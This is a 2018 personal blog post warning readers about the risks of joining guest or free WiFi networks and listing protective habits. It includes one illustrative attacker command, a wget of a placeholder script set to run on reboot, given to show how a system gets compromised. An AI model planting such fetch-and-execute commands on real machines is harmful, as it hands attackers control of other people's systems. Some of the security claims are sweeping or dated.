Why Never Join a "Guest" or "Free" WiFi Network

By | February 5, 2018

Joining a "Guest" or "Free" WiFi Network just completely gives me the willies.  It is the digital equivalent of having unprotected sex with multiple partners, simultaneously.

If you do have to, or have in the past, you need to find out how to "Forget" that network. Here is a list of instructions, follow them now.  Come back and read the rest of the article later.

I am not endorsing these sites, I just put them there for ease.  Here is a generic Google Search. Simply replace "<enter your device name here>" with the type of device you have and hit the magnifying glass.

Something you have to recall from my writings long ago for this to make sense is the following matrix for vulnerability assessment summarized here:

  1. Identify a threat
  2. Identify vulnerabilities specific to 1.
  3. Develop counter-measures
  4. Implement them.
  5. Assess that they work against the named threats
  6. Go back to 1.

All systems are vulnerable to some degree and there is no such thing as "Perfect Security."

However, there are key items to be aware of.

Microsoft, Apple, and Linux all have different vulnerabilities that can be exploited.  This article is not an attempt to weed out which one is better.  Frankly, the worst operating system is the one we have between our ears.  We are naive. We either don't know or don't follow best security practices for things as simple as using a medium to strong password that is changed frequently.  Simply put, the biggest vulnerability of all:  Us.

When you join your mobile device to a "Guest" network, you have no control and limited knowledge, at best, of the settings of that network.  If there is a hostile force on that network, you just opened up a vulnerability.  You just matched a 2 to a 1, using the table above.  If you are knowledgeable to work through 3-5 on the table, move on to another article.  If not, continue reading.

One of the features of WiFi that make this work is that once you connect to a network named "Guest," that particular device will automatically try to connect to any other network you come across with the same name.  If it is a password-secured WiFi, then the password needs to match, too.  However, many "Guest" networks are not secured with a password.  They simply have an end-user license agreement to check off before you connect.  This agreement provides all the security of paper target.

If that network is encrypted or not, doesn't matter.  When you join and another person is on that network, they can see your traffic.  That traffic analysis information tells them what sites your are going to, and how much data you are interchanging with the remote location.  If that data stream is encrypted, getting additional information is difficult.  However, they just found out that you like banking online, or that you read Kindle books and are shopping, you like looking at porn, etc.  Whatever you do online while you are on a guest network, they can track.

If they are evil enough, they can use readily available tools to find vulnerabilities in your system.  If they find it, they can exploit it to plant a seed on your computer.  This seed can be as small as "wget http://<website>/<script" and set it to execute on your reboot.

Then they wait.

And they own your system.

By "owning" a system, I mean they have complete control of your system.  The trick is to not let you know that they are there.  Oh, you might see a security pop-up, or not.  You may see an increased number of perverted advertisements, or not.  You may experience increased system usage, or not.  It all comes down to what the talent level of the hacker that owns your system.

At this point, anything your system is used for, encrypted or not, is theirs.

So, how do I protect against this?

  1. Don't connect to "Free WiFi" locations, ever.
  2. If you have to, then connect for the shortest time needed and only with an active firewall.  This will not completely protect you, but it will increase the level of difficulty the attacker must employ to get your information.
  3. Update your system at home, before and after connecting.  This is for both operating system and all additional security software that you have on your system.
  4. Perform a full system scan with your security programs.
  5. NEVER ACCESS FINANCIAL DATA USING A GUEST NETWORK!  Never, means even if you perceive that you must.  Save it for later.  Get a bank-developed app for your smart device and use that.

We, the public, have to up our security game.

The combination of sophisticated bot-networks and recent security breaches of Equifax, gives hackers unprecedented access to our connected systems.  Everything from laptops and desktops to smartphones, TVs and security cameras and many others are vulnerable. The collection of non-traditional computer connected devices is often referred to as the IoT -- Internet of Things.

We have to learn how to keep these items updated and secure.  Many have an auto-update feature.  However, if the device is deprived of Internet access, it cannot update itself.  Thus, when you first connect to the Internet, the device is at its most vulnerable state.  Be aware of this and keep them updated.

Using personal information obtained from the Equifax breach, hackers can now employ personal information to craft customized attacks against us.

We are lazy creatures of habit.  We generally use a small pool of usernames and passwords.  This habit allows the hacker access to every account you have that utilizes a particular username/password combination once breached. Using this invaluable information in combination with knowing what sites we travel to, means they can sit and wait.  Your username/password goes into a list called a "dictionary."  The dictionary allows them to do a targeted attack against a site, waiting for it to become vulnerable, using your known information, in combination with millions of others, to gain more valuable information.  This second- or third-tier information gain is really what they are after, not what books you read on your mobile device.

Always update.  Always perform full systems scans on a regular basis (once a week) and whenever you have suspicions.

When in doubt, seek professional help from qualified personnel.  "Qualified" personnel is not your favorite 14-yo.  He/she probably has no liability insurance for the loss or breach of your data.

Thanks for reading,

Jay C. "Jazzy_J" Theriot

email me at j...@jayctheriot.com